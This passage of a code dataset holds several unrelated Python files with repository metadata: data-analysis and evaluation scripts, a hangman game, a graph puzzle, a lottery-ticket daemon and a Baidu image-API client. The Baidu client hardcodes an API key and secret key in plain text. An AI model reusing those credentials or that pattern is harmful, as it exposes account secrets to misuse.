ssl_context='adhoc')\n\n\n\n\n","repo_name":"cisco-en-programmability/dnacenter_compliance","sub_path":"compliance_check_receiver.py","file_name":"compliance_check_receiver.py","file_ext":"py","file_size_in_byte":25113,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"28093487978","text":"import pandas as pd\n# import numpy as np\n# import statsmodels.api as sm\n\nstudents = pd.read_excel('students2.xlsx', sheet_name='students')\n\n# Create dummies\n# cat_vars = ['Description', 'Date', 'Continent', 'AcademicYear', 'Status', 'Category', 'StudentCode', 'Scholarship', 'ScholarshipCategory', 'Chosen']\ncat_vars = ['Chosen']\nfor var in cat_vars:\n cat_list = pd.get_dummies(students[var], prefix=var, drop_first=True)\n students = students.join(cat_list)\n students.drop(columns=var, inplace=True)\n\nprint(\"Chosen: \" + str(students.info()))\n\nY = students[['Chosen_Yes']]\nX = students.drop(columns='Chosen_Yes')\n\nprint(\"X: \" + str(X))\nprint(\"Y\\\\: \" + str(Y))\n#\n# logit_model = sm.Logit(Y, X)\n# result = logit_model.fit()\n# print(result.summary())\n\ncorrMatrix = X.corr(method ='pearson')\ncorrMatrix.to_excel(excel_writer = \"students_output.xlsx\")\n\n\n\n# print (corrMatrix)\n# print(\"corrMatrix: \" + str(corrMatrix))\n# print (corrMatrix.info())\n#\n# import xlsxwriter\n# workbook = xlsxwriter.Workbook('students_output.xlsx')\n# worksheet = workbook.add_worksheet()\n# row = 0\n# for col, data in enumerate(corrMatrix):\n# worksheet.write_column(row, col, data)\n#\n# workbook.close()\n#\n#\n","repo_name":"ermalaliraj/credit_risk_analytics","sub_path":"createDummy.py","file_name":"createDummy.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"42518949232","text":"# -*- coding: utf-8 -*-\r\n# !/usr/bin/env python\r\nimport os\r\nimport requests\r\nimport base64\r\nimport json\r\nfrom pprint import pprint\r\nimport time\r\nimport io\r\nfrom io import BytesIO\r\nimport cv2\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport glob\r\n\r\n# client_id 为官网获取的AK, client_secret 为官网获取的SK\r\napi_key = '02YtCG7XbgFUiQSby7Q5qLG3'\r\nsecret_key = 'AO2nvbYyIE3vsab3K1OoCWRdiSIUgkoQ'\r\n\r\n\r\nclass Traffic_flowRecognizer(object):\r\n def __init__(self, api_key, secret_key):\r\n self.access_token = self._get_access_token(api_key=api_key, secret_key=secret_key)\r\n self.API_URL = 'https://aip.baidubce.com/rest/2.0/image-classify/v1/body_tracking' + '?access_token=' + self.access_token\r\n # 获取token\r\n\r\n @staticmethod\r\n def _get_access_token(api_key, secret_key):\r\n api = 'https://aip.baidubce.com/oauth/2.0/token?grant_type=client_credentials&client_id={}&client_secret={}'.format(api_key, secret_key)\r\n rp = requests.post(api)\r\n if rp.ok:\r\n rp_json = rp.json()\r\n print(rp_json['access_token'])\r\n return rp_json['access_token']\r\n else:\r\n print('=>Error in getaccesstoken!')\r\n\r\n def get_result(self, params):\r\n rp = requests.post(self.API_URL, data=params)\r\n if rp.ok:\r\n print('= >Success! gotresult: ')\r\n rp_json = rp.json()\r\n pprint(rp_json)\r\n return rp_json\r\n else:\r\n print('=>Error! tokeninvalid or networkerror!')\r\n print(rp.content)\r\n return None\r\n # 人流量统计\r\n\r\n def detect(self):\r\n ###对视频进行抽帧后,抽帧频率5fps,连续读取图片\r\n WSI_MASK_PATH = 'left-right-test1' # 存放图片的文件夹路径\r\n images = os.listdir(WSI_MASK_PATH)\r\n images.sort(key=lambda x:int(x.split('.')[0]))\r\n data_list = []\r\n for i in images:\r\n f = open(WSI_MASK_PATH + '/' + i, 'rb')\r\n img_str = base64.b64encode(f.read())\r\n data_list.append(img_str)\r\n params = {'dynamic': 'true', 'area': '1,543,400,543,400,1,1,1', 'case_id': 1018, 'case_init': 'false',\r\n 'image': img_str, 'show': 'true'}\r\n tic = time.clock()\r\n rp_json = self.get_result(params)\r\n toc = time.clock()\r\n print('单次处理时长: ' + '%.2f' % (toc - tic) + ' s')\r\n img_b64encode = rp_json['image']\r\n img_b64decode = base64.b64decode(img_b64encode) # base64解码\r\n # 显示检测结果图片\r\n # image = io.BytesIO(img_b64decode)\r\n # img = Image.open(image)\r\n # img.show()\r\n # 存储检测结果图片\r\n file = open('./test_result/' + str(i) + '.jpg', 'wb')\r\n file.write(img_b64decode)\r\n file.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n recognizer = Traffic_flowRecognizer(api_key, secret_key)\r\n recognizer.detect()","repo_name":"MingBusinessman/BaiduAPI","sub_path":"other sourcecode.py","file_name":"other sourcecode.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2105569981","text":"\"\"\"\nName(s):Charlotte, Alexandra\nName of Project:Hangman\n\"\"\"\n\n#Write the main part of your program here. Use of the other pages is optional.\n\n\n#import page2 # uncomment if you're using page2\n#import page3 # uncomment if you're using page3\n#import page4 # uncomment if you're using page4\n\nimport page1\nimport random \nimport os\n\nALL_GUESSES = []\nnumber_of_answers = 3\n\ndifficulty = input(\"Choose a difficulty level: easier or harder:\")\n\nif difficulty == 'easier' or difficulty == 'Easier':\n word = random.choice(page1.easier)\nif difficulty == 'harder' or difficulty == 'Harder': \n word = random.choice(page1.harder)\ncharacters = len(word)\nprint(\"there are\", characters, \"letters in this word. You have 10 tries to guess letters and 3 tries to guess the complete word at any point\")\n\n\nlis = list(word)\n\nguess = input(\"Guess a letter/word:\")\nALL_GUESSES.append(guess)\n\n\n\n\ndef provide_clue(word):\n masked_word = '_' * len(word)\n\n for g in ALL_GUESSES:\n p = -1\n if g in word:\n p = word.index(g)\n\n if p >= 0:\n temp = list(masked_word)\n temp[p] = g\n masked_word = \"\".join(temp)\n\n return masked_word\n\ndef clear_screen():\n os.system(\"clear\")\n\n\nwhile len(ALL_GUESSES) > 0 and number_of_answers > 0:\n position = -1\n\n if len(guess) == 1:\n if guess in lis:\n print(\"Correct\")\n position = word.index(guess)\n \n else: \n print(\"Incorrect\")\n \n \n if len(guess) > 1:\n if guess == word:\n print(\"Congrats! You guessed the word!\")\n break\n else: \n print(\"Incorrect\")\n number_of_answers = number_of_answers - 1\n \n if len(ALL_GUESSES) == 10:\n print(\"Oh no! You're out of guesses for letters :(\")\n print(\"The word was:\", word)\n break \n\n if number_of_answers == 0: \n print(\"Oh no! You're out of guesses for the word :(\")\n print(\"The word was:\", word)\n break\n\n \n \n \n \n\n progress = provide_clue(word)\n\n if progress == word:\n print(\"Congrats! You guessed it! The word was\", word)\n break\n \n progress = f\"Progress: {progress}\" \n msg = \"Total guesses: %s\" % len(ALL_GUESSES)\n msg += \"\\n%s\\n\" % \", \".join(ALL_GUESSES)\n\n clear_screen()\n guess = input(f\"{progress}\\n{msg}\\n\\nGuess another letter/word: \")\n ALL_GUESSES.append(guess)\n\n\n \n\n \n ","repo_name":"huntercollegehighschool/cs9-final-project-charlottewillenbring","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18814273804","text":"# population\n\nfrom collections import deque\n\ndef make_union(row, col, num):\n union[row][col] = num\n sum_lst[num] += A[row][col]\n cnt_lst[num] += 1\n uni_lst[num].append((row, col))\n if row + 1 < n and l <= abs(A[row][col] - A[row + 1][col]) <= r and union[row + 1][col] == -1:\n make_union(row + 1, col, num)\n if col + 1 < n and l <= abs(A[row][col] - A[row][col + 1]) <= r and union[row][col + 1] == -1:\n make_union(row, col + 1, num)\n if row - 1 >= 0 and l <= abs(A[row][col] - A[row - 1][col]) <= r and union[row - 1][col] == -1:\n make_union(row - 1, col, num)\n if col - 1 >= 0 and l <= abs(A[row][col] - A[row][col - 1]) <= r and union[row][col - 1] == -1:\n make_union(row, col - 1, num)\n return 0\n\nn, l, r = map(int, input().split())\n\nA = [[] for _ in range(n)]\n\nfor i in range(n):\n A[i] = list(map(int, input().split()))\n\n\nresult = 0\nwhile result <= 2000:\n union = [[-1] * n for _ in range(n)]\n uni_lst = [[] for _ in range(n * n)]\n sum_lst = [0] * (n * n)\n cnt_lst = [0] * (n * n)\n num = 0\n for row in range(n):\n for col in range(n):\n is_union = False\n if union[row][col] == -1:\n make_union(row, col, num)\n num += 1\n\n\n if num != n*n:\n for i in range(num):\n for x, y in uni_lst[i]:\n A[x][y] = sum_lst[i]//cnt_lst[i]\n result += 1\n else:\n break\n\nprint(result)\n\n\n","repo_name":"salixkang/python-algorithm-practice","sub_path":"Book/DFS,BFS/13-7.py","file_name":"13-7.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29339200007","text":"import os\r\nimport sys\r\nimport argparse\r\nimport yaml\r\nimport numpy as np\r\nimport pandas as pd\r\nimport glob\r\nfrom skimage import io\r\nfrom pprint import pprint\r\nimport re\r\nimport pathlib\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.colors as colors\r\n\r\n\r\ndef read_pred_gt_data(path_pred, path_gt): \r\n \r\n # read data from path\r\n pred = io.imread(path_pred)\r\n gt = io.imread(path_gt)\r\n \r\n # process pred and gt\r\n new_width = min(pred.shape[0], gt.shape[0]) # perhaps one pixel shift, so to make their shape the same\r\n new_height = min(pred.shape[1], gt.shape[1])\r\n\r\n pred = pred[:new_width, :new_height]\r\n gt = gt[:new_width, :new_height]\r\n\r\n # turn 255 in gt or pred to 1\r\n pred[pred>0] = 1\r\n gt[gt>0] = 1\r\n \r\n return pred, gt\r\n\r\n\r\ndef visualize_diff(pred, gt, thres, path_out):\r\n \r\n # diff = gt - pred\r\n colour_dict = {-1: colors.to_rgb('crimson'), # false positive\r\n 0: colors.to_rgb('gainsboro'),\r\n 1: colors.to_rgb('blue')} # false negative\r\n \r\n colours_rgb = [colour_dict[i] for i in [-1, 0, 1]]\r\n colours_rgb = colors.ListedColormap(colours_rgb)\r\n\r\n # here, the values of gt and pred should be 0 and 1.\r\n # the values of diff: -1 (false positive), 0, 1 (false negative)\r\n diff = gt - pred \r\n \r\n plt.figure(figsize=(50, 50))\r\n plt.axis('off')\r\n \r\n path_out_diff = os.path.join(path_out, \"diff.png\")\r\n plt.imshow(diff, cmap=colours_rgb, vmin=-1, vmax=1)\r\n plt.savefig(path_out_diff, bbox_inches='tight')\r\n \r\n path_out_gt = os.path.join(path_out, \"gt.png\")\r\n plt.imshow(gt)\r\n plt.savefig(path_out_gt, bbox_inches='tight')\r\n \r\n path_out_pred = os.path.join(path_out, \"mask_pred_binary\"+str(thres)+\".png\")\r\n plt.imshow(pred)\r\n plt.savefig(path_out_pred, bbox_inches='tight')\r\n\r\n\r\ndef calculate_iou(pred, gt):\r\n\r\n # IoU calculation = intersection / uniion\r\n intersection = np.logical_and(pred, gt)\r\n union = np.logical_or(pred, gt)\r\n iou_score = np.sum(intersection) / np.sum(union)\r\n \r\n return iou_score\r\n\r\n\r\ndef calculate_precision(pred, gt):\r\n \r\n # precision = TP (true predicted postive) / AP (all positive in gt)\r\n TP = np.sum(np.logical_and(pred, gt))\r\n AP = np.sum(pred)\r\n precision_score = TP / (AP + 1e-6)\r\n \r\n return precision_score\r\n\r\n\r\ndef calculate_recall(pred, gt):\r\n \r\n # recall = TP / PP (predicted postive)\r\n TP = np.sum(np.logical_and(pred, gt))\r\n PP = np.sum(gt) \r\n recall_score = TP / (PP + 1e-6)\r\n \r\n return recall_score\r\n\r\n\r\ndef calculate_f1(pred, gt):\r\n \r\n # f1 = 2 * precision * recall / (precision + recall)\r\n precision = calculate_precision(pred, gt)\r\n recall = calculate_recall(pred, gt)\r\n f1_score = 2 * precision * recall / (precision + recall + 1e-6)\r\n \r\n return f1_score\r\n\r\n\r\ndef evaluate_metrics(pred, gt):\r\n \r\n eval_dict = {}\r\n \r\n recall = calculate_recall(pred, gt)\r\n precision = calculate_precision(pred, gt)\r\n f1= calculate_f1(pred, gt)\r\n iou = calculate_iou(pred, gt)\r\n \r\n eval_dict[\"recall\"] = recall\r\n eval_dict[\"precision\"] = precision\r\n eval_dict[\"f1\"] = f1\r\n eval_dict[\"iou\"] = iou\r\n \r\n return eval_dict\r\n \r\n \r\ndef filter_epoch_folder(path_list):\r\n \r\n def sort_key(s):\r\n # Extract the numerical part if the string starts with 'epoch'\r\n if s.startswith('epoch'):\r\n return int(re.findall(r'\\d+', s)[0])\r\n # Return a high value for other strings so that they come at the end\r\n return float('inf')\r\n\r\n sorted_files = sorted(path_list, key=sort_key)\r\n\r\n sorted_files_epoch = []\r\n\r\n for item in sorted_files:\r\n if item.startswith(\"epoch\"):\r\n sorted_files_epoch.append(item) \r\n\r\n return sorted_files_epoch\r\n \r\n\r\n# main function for predicted results from many epochs\r\n# path_pred is the parent directory of all results from different epochs\r\n# to create a csv to record all of the results \r\ndef main(path_pred, path_gt, thres, size):\r\n \r\n epoch_list = os.listdir(path_pred)\r\n sorted_epoch_list = filter_epoch_folder(epoch_list)\r\n \r\n epoch_namelist = [ep_name[5:] for ep_name in sorted_epoch_list]\r\n \r\n accuracy_results = {\r\n 'epoch': epoch_namelist,\r\n 'f1': [],\r\n 'iou': [],\r\n 'recall': [],\r\n 'precision': []\r\n }\r\n\r\n if size == \"small\" or size == \"large\" or size == \"small_augmentation\":\r\n for epoch in sorted_epoch_list:\r\n\r\n # path of predicted results\r\n path_pred_out = os.path.join(path_pred, epoch, \"pred_mask_bin\"+str(thres)+\".tif\")\r\n path_pred_diff = os.path.join(path_pred, epoch)\r\n\r\n # read predicted binary mask and gt mask\r\n pred, gt = read_pred_gt_data(path_pred_out, path_gt)\r\n\r\n # evaluate \r\n eval_result = evaluate_metrics(pred, gt)\r\n\r\n accuracy_results[\"recall\"].append(eval_result[\"recall\"])\r\n accuracy_results[\"precision\"].append(eval_result[\"precision\"])\r\n accuracy_results[\"f1\"].append(eval_result[\"f1\"])\r\n accuracy_results[\"iou\"].append(eval_result[\"iou\"])\r\n\r\n # visualize images, gt, and predicted binary mask\r\n visualize_diff(pred, gt, thres, path_pred_diff)\r\n\r\n # Create the DataFrame\r\n df = pd.DataFrame.from_dict(accuracy_results)\r\n\r\n # Save to CSV\r\n csv_file = os.path.join(path_pred, 'accuracy_results.csv')\r\n df.to_csv(csv_file, index=False)\r\n\r\n print(f'{csv_file} has been created successfully!')\r\n \r\n elif size == \"noFT\":\r\n # path of predicted results\r\n path_pred_out = os.path.join(path_pred, \"pred_mask_noFT.tif\")\r\n \r\n # read predicted binary mask and gt mask\r\n pred, gt = read_pred_gt_data(path_pred_out, path_gt)\r\n\r\n # evaluate \r\n eval_result = evaluate_metrics(pred, gt)\r\n \r\n # visualize images, gt, and predicted binary mask\r\n visualize_diff(pred, gt, thres, path_pred)\r\n \r\n print(path_pred_out)\r\n pprint(eval_result)\r\n \r\n \r\nif __name__ == '__main__':\r\n \r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--data', default=None, help=\"Dagaha2017 Djibo2019...\")\r\n parser.add_argument('--upsample', default=\"1024\", help=\"1024 or SR\") \r\n parser.add_argument('--size', default=\"small\", help=\"small or large or noFT\") \r\n parser.add_argument('--uptype', default=\"\", help=\"nearest bilinear EDSR\") \r\n parser.add_argument('--thres', default=0.5, help=\"the threshold to determine the binary map\") \r\n \r\n # path_data = \"path of your data folder\" # e.g. \"/home/usr/Data\"\r\n path_data = \"/home/yunya/anaconda3/envs/Data\"\r\n \r\n # read prompts\r\n args = parser.parse_args()\r\n data_name = args.data\r\n size = args.size\r\n upsample = args.upsample\r\n uptype = args.uptype\r\n thres = args.thres\r\n\r\n # testing data\r\n if upsample == \"1024\":\r\n path_test_data = os.path.join(path_data, data_name, \"raw\", \"test\")\r\n path_pred = os.path.join('outputs', data_name, size, upsample)\r\n \r\n elif upsample == \"SR\":\r\n path_test_data = os.path.join(path_data, data_name, \"SAM\", upsample, \"test\")\r\n path_pred = os.path.join('outputs', data_name, size, upsample, uptype)\r\n \r\n pathlib.Path(path_pred).mkdir(parents=True, exist_ok=True)\r\n path_gt = glob.glob(os.path.join(path_test_data, \"gt\") + \"/*.tif\")[0]\r\n\r\n # run the main function\r\n main(path_pred, path_gt, thres, size)\r\n ","repo_name":"YunyaGaoTree/SAM-Adapter-For-Refugee-Dwelling-Extraction","sub_path":"run_sam/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":7664,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"21205812760","text":"#!/usr/bin/python3\n\n#==============================================================================\n # Assignment: Milestone 3, lottery ticket generator daemon\n #\n # Author: Derek Chan\n # Language: Python\n #\n # To Compile: \n #\n # Class: Python for Programmers: Sockets and Security DPI912\n # Professor: Harvey Kaduri\n # Due Date: 2020-10-27\n # Submitted: 2020-12-06\n #\n #-----------------------------------------------------------------------------\n #\n # Description: Update the daemon so that it is able to take start/stop commands, also\n # separate the daemon from the terminal that started the process with double fork\n #\n # Collaboration: \n #\n # Input: The daemon will accept a connection to a client, the child process of the daemon will\n # receive the ticket type and ticket amount.\n #\n # Output: Daemon child process will generate the numbers for the type of ticket it is requested to\n # do and send it back to the client as a string.\n #\n # Algorithm: The parent process of the daemon will constantly be listening for connections, once\n # a connection arrives, the parent will attempt to fork and have the child process handle the request,\n # the child process will then send the ticket data back to the client and exit.\n #\n # Required Features Not Included: \n #\n # Known Bugs: Not sure how to have the -stop command delete the directory after, program will keep thinking\n # that the process is running even though it isnt due to the directory for the daemon process still existing\n #\n # Classification: Will be attempting prototype B, uncertain if this meets A's requirements\n #\n#==============================================================================\n\nimport argparse\nimport atexit\nimport errno\nimport logzero\nimport os\nimport random\nimport signal\nimport socket\nimport sys\nimport time\n\nfrom logzero import logger\nfrom socket import *\nfrom signal import *\n\n#defining the function childHandler to check for zombie processes, will kill if there are any\ndef childHandler(signalNumber, frame):\n while True:\n try:\n pid, status = os.waitpid(-1, os.WNOHANG)\n except OSError:\n return\n if pid == 0:\n return\n\n#defining the function to log numbers in a file for the daemon before sending them to the user\ndef logNumbers(ticketNumbers):\n logger.info(f'Child: {os.getpid()} is storing generated ticket numbers: \\n {ticketNumbers}')\n\n#The requestHandler function is used by child processes so they know how to handle\n#a client request, the function will receive the ticket type and amount from the client \n#and call the generateTicket Function to create the tickets. Ticket data is sent back to client\ndef requestHandler(socketConnection):\n clientRequest = socketConnection.recv(128)\n clientData = clientRequest.decode('utf-8')\n clientData = list(clientData.split(' '))\n ticketResults = generateTicket(clientData[0], int(clientData[1]))\n socketConnection.send(ticketResults.encode('utf-8'))\n \n#This functions purpose is handling the creation of tickets.\n#it will match the parameters provided to the corresponding ticket type and loop based on amount needed\ndef generateTicket(requestedType, requestedAmount):\n lotteryPool = []\n temporaryString = ''\n\n if(requestedType == '649'):\n #for loop used to generate new pool of numbers\n #and create a temporary ticket to store the numbers picked\n for i in range(0, int(requestedAmount)):\n lotteryPool = list(range(1, 50))\n #numbers in the pool are shuffled each time the for loop is called\n #a number is popped from the lotteryPool list and saved into pickedNumber variable\n #the number is then appended to a temporaryTicket list\n for j in range(0, 6):\n random.shuffle(lotteryPool)\n pickedNumber = lotteryPool.pop()\n temporaryString += str(pickedNumber)\n if(j < 5):\n temporaryString += ', '\n if(i < (int(requestedAmount)-1)):\n temporaryString += '\\n'\n\n elif(requestedType == 'max'):\n #for loop used to generate new pool of numbers\n #and create a temporary ticket to store the numbers picked\n for i in range(0, int(requestedAmount)):\n lotteryPool = list(range(1, 51))\n #loop to add sets of six numbers in a temporarySet list\n for j in range(0, 3):\n #numbers in the pool are shuffled each time the for loop is called\n #a number is popped from the lotteryPool list and saved into pickedNumber variable\n #the number is then appended to a temporarySet list\n for k in range(0, 7):\n random.shuffle(lotteryPool)\n pickedNumber = lotteryPool.pop()\n temporaryString += str(pickedNumber)\n if(k < 6):\n temporaryString += ', '\n #once a set of numbers is completed, it is added to the temporaryTicket list\n if(j < 2):\n temporaryString += '/'\n #once all the sets of numbers are added to the temporary ticket, it is added to ticketList\n #ticketList stores all the tickets generated in a list to be displayed later\n if(i < (int(requestedAmount) - 1)):\n temporaryString += '\\n'\n\n elif(requestedType == 'dg'):\n #for loop used to generate new pool of numbers\n #and create a temporary ticket to store the numbers picked\n #a bonus pool list is also created for the special number from 1 to 7\n for i in range(0, int(requestedAmount)):\n lotteryPool = list(range(1, 50))\n bonusPool = list(range(1, 8))\n #numbers in the pool are shuffled each time the for loop is called\n #a number is popped from the lotteryPool list and saved into pickedNumber variable\n for j in range(0, 5):\n random.shuffle(lotteryPool)\n pickedNumber = lotteryPool.pop()\n temporaryString += str(pickedNumber)\n if(j <= 4):\n temporaryString += ', '\n #numbers in the bonus pool are shuffled then popped as the last number for the ticket\n random.shuffle(bonusPool)\n pickedNumber = bonusPool.pop()\n temporaryString += str(pickedNumber)\n if(i < (int(requestedAmount) -1)):\n temporaryString += '\\n'\n \n logNumbers(temporaryString)\n return temporaryString\n\n#The run daemon function purpose is setting up the parent process to listen for connections\n#and fork itself if needed when client requests arrive\ndef runDaemon():\n requestQueueSize = 100\n try:\n parentSocket = socket(AF_INET6, SOCK_STREAM)\n parentSocket.setsockopt (SOL_SOCKET, SO_REUSEADDR, 1)\n parentSocket.bind(connectionData)\n parentSocket.listen(requestQueueSize)\n signal(SIGCHLD, childHandler)\n print(f'Listening on port: {daemonPort}')\n while True:\n try:\n socketConnection, clientAddress = parentSocket.accept()\n except IOError as e:\n code, msg = e.args\n if (code == errno.EINTR):\n continue\n else:\n raise\n \n try:\n pid = os.fork()\n except OSError:\n sys.stderr.write('Failed to create child process')\n continue\n \n #if process is a child, it will close the parent connection and that connection will now be passed\n #to the child process instead, requestHandler function is then called to handle the request\n if (pid == 0):\n parentSocket.close()\n requestHandler(socketConnection)\n socketConnection.close()\n os._exit(0)\n else:\n socketConnection.close()\n except Exception as error:\n print(error)\n parentSocket.close()\n\n#defining the function to fully daemonize and separate the program from the CLI\ndef daemonize(pidFile, *, \n stdin='/dev/null', \n stdout='/dev/null', \n stderr='/dev/null'):\n \n #checks to see if Daemon is already running\n if (os.path.exists(pidHolder)):\n print(pidHolder)\n logger.error('Daemon process already running.')\n raise RuntimeError('Daemon process already running.')\n \n #Attempting first fork\n try:\n if (os.fork() > 0):\n raise SystemExit(0)\n except OSError as e:\n logger.error('Failed to execute first fork for daemonize')\n raise RuntimeError('Failed to execute first fork for daemonize: ' + e)\n \n #Changing IDs of the process and permissions\n id = os.getuid()\n os.chdir('/')\n os.umask(0)\n os.setsid()\n os.setuid(id)\n os.setgid(id)\n \n #Attempting second fork\n try:\n if (os.fork() > 0):\n raise SystemExit(0)\n except OSError as e:\n logger.error('Failed to execute second fork for daemonize')\n raise RuntimeError('Failed to execute second fork for daemonize: ' + e)\n \n sys.stdout.flush()\n sys.stderr.flush()\n \n with open(stdin, 'rb', 0) as stdReplace:\n os.dup2(stdReplace.fileno(), sys.stdin.fileno())\n with open(stdout, 'ab', 0) as stdReplace:\n os.dup2(stdReplace.fileno(), sys.stdout.fileno())\n with open(stderr, 'ab', 0) as stdReplace:\n os.dup2(stdReplace.fileno(), sys.stderr.fileno())\n \n dirPath = '/tmp/'\n newDirName = \"tempDirectory\"\n path = os.path.join(dirPath, newDirName)\n\n if os.path.exists(path) == False :\n os.mkdir(path)\n\n with open(pidFile, 'w') as pidFile:\n print(os.getpid(), file=pidFile)\n \n #Pid file is deleted before exiting\n atexit.register(lambda: os.remove(pidFile))\n \ndef sigtermHandler(signo, frame):\n raise SystemExit(1)\n \ndef statusLogging():\n sys.stdout.write(f'Daemon processes given pid {os.getpid()}\\n')\n \n while True:\n sys.stdout.write(f'Daemon running as of: {time.ctime()}\\n')\n time.sleep(60)\n\nif __name__ == '__main__':\n connectionData = ('::1', 8080)\n daemonHost = '::1'\n daemonPort = 8080\n pidHolder = '/tmp/tempDirectory/daemonInfo.pid'\n signal(SIGTERM, sigtermHandler)\n \n parser = argparse.ArgumentParser(description = 'Python Milestone 3 Lottery Ticket Data Generator')\n daemonAction = parser.add_mutually_exclusive_group(required = True)\n \n daemonAction.add_argument('-start', action = 'store_const', dest = 'daemonAction',\n help = 'starts the daemon if it is not running', \n const = 1)\n \n daemonAction.add_argument('-stop', action = 'store_const', dest = 'daemonAction', \n help = 'Stops the daemon if it is running', \n const = 0)\n \n parameters = parser.parse_args()\n\n logzero.logfile('/tmp/daemon-logfile.log', \n maxBytes= 1e6, backupCount= 2, disableStderrLogger= True)\n \n if (parameters.daemonAction):\n try:\n daemonize(pidHolder, stdout = '/tmp/daemon.log', \n stderr = '/tmp/daemonErrors.log')\n except RuntimeError as e:\n print(e, file = sys.stderr)\n raise SystemExit(1)\n logger.info(f'Started processes with {os.getpid()}')\n try:\n runDaemon()\n except Exception as e:\n logger.error(e)\n raise SystemExit(1)\n \n else:\n if os.path.exists(pidHolder):\n with open(pidHolder) as pidFile:\n os.kill(int(pidFile.read()), SIGTERM)\n \n else:\n logger.error('Daemon is not running!')\n print('Daemon is not running!', file = sys.stderr)\n raise SystemExit(1)\n\n\n\n\n\n\n","repo_name":"drkcn94/Y3S5_Python","sub_path":"m3/m3-daemon.py","file_name":"m3-daemon.py","file_ext":"py","file_size_in_byte":12209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25602211655","text":"import networkx as nx\nimport os\nimport urllib.request as req\nfrom ..Clustering import Clustering\n\n'''\n This file retrieves the datasets from https://github.com/altsoph/community_loglike \n To retrieve the tuple (graph,groundtruth) of a dataset, simply use load_dataset(name).\n The graph is returned as a networkx graph, while the ground truth is returned as a Clustering.\n To retrieve a dictionary indexed by the network names, simply use load_datasets().\n'''\n\nnetwork_names = [\n 'karate',\n 'dolphins',\n 'polbooks',\n 'football',\n 'eu-core',\n 'polblogs',\n 'cora',\n 'as'\n]\n\ndef load_network(url):\n file = req.urlopen(url)\n return nx.read_edgelist(file)\n\n\ndef load_clustering(url):\n file = req.urlopen(url)\n return Clustering(dict([\n l.strip().decode(\"utf-8\").split('\\t')\n for l in file.readlines()\n ]))\n\n\ndef load_dataset(name):\n url_start = \"https://raw.githubusercontent.com/altsoph/community_loglike/master/datasets/{}/{}\".format(\n name if name!=\"cora\" else \"cora_full\", name\n )\n return load_network(url_start + \".edges\"), load_clustering(url_start + \".clusters\")\n\n\ndef load_datasets():\n networks = {\n name: load_dataset(name)\n for name in network_names\n }\n # Sort ascendingly in network size\n networks_sorted = sorted(network_names, key=lambda name: len(networks[name][0]))\n return {\n name: networks[name]\n for name in networks_sorted\n }","repo_name":"MartijnGosgens/hyperspherical_community_detection","sub_path":"experiments/benchmarknetworks.py","file_name":"benchmarknetworks.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"40890140710","text":"from __future__ import print_function\nimport os\nimport shutil\nimport subprocess\nimport argparse\nimport sys\nimport re\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-v', '--vect', nargs='*',default=['SSE', 'AVX'],\n help='vectorization levels (default: [SSE,AVX])')\nparser.add_argument('-n', '--nthreads', nargs='*',\n default=[1,2,4,8],type=int,\n help='sequence of nthreads for benchmarks (default: [1,2,4,8])')\nparser.add_argument('-r', '--runs', nargs='*',\n default=[0,1,2,3,4],type=int,\n help='sequence of runs for benchmarks (default: [0,1,2,3,4])')\nparser.add_argument('-t', '--test', action='store_true',\n help='flag to test script (runs a single iteration)')\nparser.add_argument('-b', '--binq', action='store_true',\n help='flag to submit the binq bench version of the executable')\nparser.add_argument('-d', '--data-dir', type=str, required=True,\n help='data directory with coreneuron dataset' )\nparser.add_argument('-w', '--weak-scaling', action='store_true',\n help='activates weak scaling mode (default: off)' )\nparser.add_argument('-s', '--single-thread', action='store_true',\n help='only perform single thread benchmarks (default: off)')\nparser.add_argument('-g', '--single-run', action='store_true',\n help='only perform a single run of the benchmarks (default: off)')\nargs = parser.parse_args()\n\n#### CONFIG\n# base_exec_dir and vect_2_exec are such that:\n# base_exec_dir + vect_2_exec[vec] + '/bin/coreneuron_exec'\n# points to the coreneuron executable\nbase_exec_dir='/home/hpc/ihpc/ihpc029h/soft/coreneuron/'\nvect_2_exec=dict(\n SSE='install-likwid',\n AVX='install-likwid-avx-IVB',\n )\n####\n\ndata_dir=args.data_dir\nvect_levels=args.vect\n\nif args.single_run:\n runs = [0]\nelse:\n runs = args.runs\n\nnthreads = args.nthreads\nif args.test or args.single_thread:\n nthreads = [1]\nnthreads = sorted( nthreads )\nnthreads.reverse()\n#### END CONFIG\n\nbase_dir = os.getcwd()\n\nfor vec in vect_levels:\n base_name = data_dir.split('/')[-1] if data_dir.split('/')[-1] else data_dir.split('/')[-2]\n vec_dir_name = re.split('_[0-9]*cells.*', base_name)[0]\n vec_dir_name += '_' + vec + '_ivb'\n for run in runs:\n run_dir_name = 'run' + str(run)\n experiment_dir = os.path.join( base_dir, vec_dir_name, run_dir_name )\n if not os.path.exists(experiment_dir):\n os.makedirs( experiment_dir )\n shutil.copyfile( 'submit_template.sh', os.path.join( experiment_dir, 'submit.sh' ) )\n\n with open( os.path.join( experiment_dir, 'submit.sh' ), 'r' ) as submit_f:\n filedata = submit_f.read()\n\n filedata = filedata.replace( '##DATA_DIR##', data_dir )\n filedata = filedata.replace( '##RES_DIR##', experiment_dir )\n if not args.binq:\n filedata = filedata.replace( '##EXEC_DIR##', base_exec_dir + vect_2_exec[vec] + '/bin/coreneuron_exec' )\n else:\n filedata = 